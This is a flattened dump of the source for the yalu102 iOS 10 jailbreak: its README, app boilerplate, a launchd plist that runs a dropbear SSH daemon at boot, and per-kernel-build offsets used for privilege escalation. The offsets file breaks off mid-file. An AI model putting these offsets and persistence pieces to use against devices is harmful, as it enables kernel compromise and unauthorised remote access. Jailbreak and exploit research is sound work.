| !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | 26 | .DS_Store 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/LICENSE: -------------------------------------------------------------------------------- 1 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 2 | Version 2, December 2004 3 | 4 | Copyright (C) 2004 Sam Hocevar 5 | 6 | Everyone is permitted to copy and distribute verbatim or modified 7 | copies of this license document, and changing it is allowed as long 8 | as the name is changed. 9 | 10 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 11 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 12 | 13 | 0. You just DO WHAT THE FUCK YOU WANT TO. 14 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/README.md: -------------------------------------------------------------------------------- 1 | # yalu102 2 | 3 | ![Yalu logo](https://github.com/kpwn/yalu102/blob/master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png?raw=true) 4 | 5 | A "work in progress" iOS jailbreak for 64-bit devices created by [qwertyoruiopz](https://twitter.com/qwertyoruiopz) and [marcograssi](marcograss). 6 | 7 | Please use the "Issues" tab for **code related** issues only. If you need support please search on [/r/jailbreak](https://reddit.com/r/jailbreak) before posting a question there. 8 | 9 | ## Supported Devices and iOS versions 10 | 11 | | Device | Version | 12 | |---------|----------| 13 | | iPad Pro | iOS 10.0.0 -> iOS 10.2 | 14 | | iPhone 6S | iOS 10.0.0 -> iOS 10.2 | 15 | | iPhone SE | iOS 10.0.0 -> iOS 10.2 | 16 | | iPhone 5S | iOS 10.0.0 -> iOS 10.2 | 17 | | iPad Air| iOS 10.0.0 -> iOS 10.2 | 18 | | iPad Mini 2| iOS 10.0.0 -> iOS 10.2 | 19 | | iPhone 6 | iOS 10.0.0 -> iOS 10.2 | 20 | | iPad Mini 3| iOS 10.0.0 -> iOS 10.2 | 21 | | iPad Air 2| iOS 10.0.0 -> iOS 10.2 | 22 | | iPad Mini 4 | iOS 10.0.0 -> iOS 10.2 | 23 | | iPod touch (6G) | iOS 10.0.0 -> iOS 10.2 | 24 | 25 | ### Planned Support: 26 | 27 | In the near future, the jailbreak will support the following devices: 28 | 29 | | Device | Version | 30 | |---------|----------| 31 | | iPhone 7 | iOS 10.0.0 -> iOS 10.1.1 | 32 | 33 | **Note, the iPhone 7 is only supported till iOS 10.1.1** 34 | If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual exploit behind this still works, but the KPP bypass does not. 35 | 36 | ## Compiling: 37 | 38 | 1. `git clone` the repo. 39 | 2. Open the repo in Xcode 40 | 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) 41 | 4. Include the IOKit headers, and add them to your search path. 42 | 5. Run the project. 43 | 44 | ## Warnings 45 | 46 | This jailbreak is a work in progress. Some things do not work, but most things do. 47 | 48 | Do not install things that are untested. 49 | 50 | **AppSync and other unsupported and untested software will probably throw your device into a bootloop or do other bad things.** Do not open an issue complaining that your device has been bootlooped because you installed other software. You have been warned. 51 | 52 | ## Installing 53 | 54 | > DO NOT DOWNLOAD THIS SOFTWARE FROM OTHER SOURCES OTHER THAN THESE LINKS UNDER ANY CIRCUMSTANCE. IT IS VERY EASY TO BACKDOOR THIS SORT OF SOFTWARE TO CONTAIN MALWARE. PLEASE BE EXTREMELY CAREFUL. THESE MIRRORS ARE TRUSTED, BUT STILL CHECK THE SHA1. 55 | 56 | * Download the pre-compiled version from the table below. 57 | * [Check the SHA1 hash](http://onlinemd5.com) of the downloaded file (optional but recommended). 58 | * Install using [Cydia Impactor](http://www.cydiaimpactor.com/). 59 | * Open the application and follow instructions. 60 | 61 | 62 | | Version | Download | SHA1 | 63 | |---------|----------|------| 64 | | Beta 7 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta7.ipa) | 4afa99d4b568aa8cbb9ac61fddd584111fed79c5 | 65 | | Beta 6 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta6.ipa) | 0130ebe60c97e2013a4b849b7d9bc321d749f304 | 66 | | Beta 5 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta5.ipa) | f8eb6cd37054a9d25b818e3bddd13bfedbf72df1 | 67 | | Beta 4 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta4.ipa) | f8270e59d7d7267613ffa63217b91fea425eec36 | 68 | | Beta 3 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta3.ipa) | b2e0bdd31566f876d67cba036b5d29aef7ff257d | 69 | | Beta 2 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta.ipa) | 4fddad7cca8aa0c0a6579c1d63d00917f15efc86 | 70 | | Beta 1 | [Link](https://yalu.qwertyoruiop.com/yalu102_alpha.ipa) | 2fe14f1c1e1a0d26203bbb123f6747a978dd2b4f | 71 | 72 | ## Contributing 73 | 74 | Create a fork of the repository, make your changes and then create a pull request. 75 | Please be sure to check if the pull request has been made before, before creating a new one. Note, any pull requests adding IOKit headers will be closed. Please respect copyright laws, and do not distribute / download IOKit headers from unofficial sources: they are bundled legally with macOS SDK 76 | 77 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "AppIcon40x40~ipad-2.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "AppIcon60x60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "AppIcon40x40@2x~ipadsptl.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "AppIcon40x40@2x~ipadsptl3.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "AppIcon40x40@2x~ipad-1.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "AppIcon40x40@3x~iphone.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "AppIcon60x60@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "AppIcon60x60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "AppIcon40x40@2x~ipadnotif.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "AppIcon40x40~ipad-1.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "AppIcon40x40@2x~ipadsptlsmal.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "AppIcon40x40@2x~ipadsptl-1.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "AppIcon40x40~ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "AppIcon40x40@2x~ipad.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "AppIcon60x60~ipad.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "AppIcon60x60@2x~ipad.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "AppIcon60x60@2x~ipadpro.png", 103 | "scale" : "2x" 104 | } 105 | ], 106 | "info" : { 107 | "version" : 1, 108 | "author" : "xcode" 109 | } 110 | } -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 39 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | { 13 | IBOutlet UIButton* dope; 14 | } 15 | - (IBAction)yolo:(id)sender; 16 | 17 | @end 18 | 19 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/bootstrap.tar -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/devicesupport.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "devicesupport.h" 3 | #import 4 | #import 5 | 6 | 7 | NSMutableArray* consttable = nil; 8 | NSMutableArray* collide = nil; 9 | int constload() { 10 | struct utsname uts; 11 | uname(&uts); 12 | if (strstr(uts.version, "Marijuan")) { 13 | return -2; 14 | } 15 | 16 | NSString* strv = [NSString stringWithUTF8String:uts.version]; 17 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 18 | int m = 0; 19 | collide = [NSMutableArray new]; 20 | 21 | for (NSDictionary* dict in dp) { 22 | if ([dict[@"vers"] isEqualToString:strv]) { 23 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 24 | int i = 0; 25 | for (NSString* str in dict[@"val"]) { 26 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 27 | i++; 28 | } 29 | m++; 30 | } 31 | } 32 | if (m) { 33 | return 0; 34 | } 35 | return -1; 36 | } 37 | char affine_const_by_surfacevt(uint64_t surfacevt_slid) 38 | { 39 | for (NSArray* arr in collide) { 40 | if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 41 | NSLog(@"affined"); 42 | consttable = arr; 43 | return 0; 44 | } 45 | } 46 | return -1; 47 | } 48 | uint64_t constget(int idx){ 49 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 50 | } 51 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/dropbear.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | ShaiHulud 7 | Program 8 | /usr/local/bin/dropbear 9 | ProgramArguments 10 | 11 | /usr/local/bin/dropbear 12 | -F 13 | -R 14 | -p 15 | 127.0.0.1:22 16 | 17 | RunAtLoad 18 | 19 | KeepAlive 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/iokitmig64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/iokitmig64.o -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/launchctl -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/offsets.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "offsets.h" 7 | 8 | uint64_t allproc_offset; 9 | uint64_t kernproc_offset; 10 | uint64_t procoff; 11 | uint64_t rootvnode_offset; 12 | 13 | void init_offsets() { 14 | struct utsname u = { 0 }; 15 | uname(&u); 16 | 17 | printf("sysname: %s\n", u.sysname); 18 | printf("nodename: %s\n", u.nodename); 19 | printf("release: %s\n", u.release); 20 | printf("version: %s\n", u.version); 21 | printf("machine: %s\n", u.machine); 22 | 23 | allproc_offset = 0x5a4148; 24 | procoff = 0x360; 25 | rootvnode_offset = 0x5aa0b8; 26 | 27 | /* 28 | Offsets shared by: 29 | - @qwertyoruiop 30 | - @Mila432 31 | - @Andywiik 32 | - @nicogibbons 33 | - @jtv7 34 | - @onchehuh 35 | */ 36 | 37 | if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { 38 | allproc_offset = 0x5b8528; 39 | rootvnode_offset = 0x5be0b8; 40 | } 41 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { 42 | allproc_offset = 0x5b8468; 43 | rootvnode_offset = 0x5be0b8; 44 | } 45 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { 46 | allproc_offset = 0x5a8438; 47 | rootvnode_offset = 0x5ae0b8; 48 | } 49 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { 50 | allproc_offset = 0x5ac418; 51 | rootvnode_offset = 0x5b20b8; 52 | } 53 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { 54 | allproc_offset = 0x5ec478; 55 | rootvnode_offset = 0x5f20b8; 56 | } 57 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000") == 0) { 58 | allproc_offset = 0x5b8468; 59 | rootvnode_offset = 0x5be0b8; 60 | }//apple tv 4 61 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000") == 0) { 62 | allproc_offset = 0x5b8468; 63 | rootvnode_offset = 0x5be0b8; 64 | }//apple tv 4 65 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000") == 0) { 66 | allproc_offset = 0x5b4168; 67 | rootvnode_offset = 0x5ba0b8; 68 | }//apple tv 4 69 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { 70 | allproc_offset = 0x5ec178; 71 | rootvnode_offset = 0x5f20b8; 72 | } 73 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { 74 | allproc_offset = 0x5b4228; 75 | rootvnode_offset = 0x5ba0b8; 76 | } 77 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { 78 | allproc_offset = 0x5b4168; 79 | rootvnode_offset = 0x5ba0b8; 80 | } 81 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { 82 | allproc_offset = 0x5a4148; 83 | rootvnode_offset = 0x5aa0b8; 84 | } 85 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { 86 | allproc_offset = 0x5a4128; 87 | rootvnode_offset = 0x5aa0b8; 88 | } 89 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { 90 | allproc_offset = 0x5ec178; 91 | rootvnode_offset = 0x5f20b8; 92 | } 93 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { 94 | allproc_offset = 0x5b0228; 95 | rootvnode_offset = 0x5b60b8; 96 | } 97 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { 98 | allproc_offset = 0x5b0168; 99 | rootvnode_offset = 0x5b60b8; 100 | } 101 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { 102 | allproc_offset = 0x5a4148; 103 | rootvnode_offset = 0x5aa0b8; 104 | } 105 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { 106 | allproc_offset = 0x5a4128; 107 | rootvnode_offset = 0x5aa0b8; 108 | } 109 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0) { 110 | allproc_offset = 0x5a4128; 111 | rootvnode_offset = 0x5aa0b8; 112 | }//some beta ios 113 | else { 114 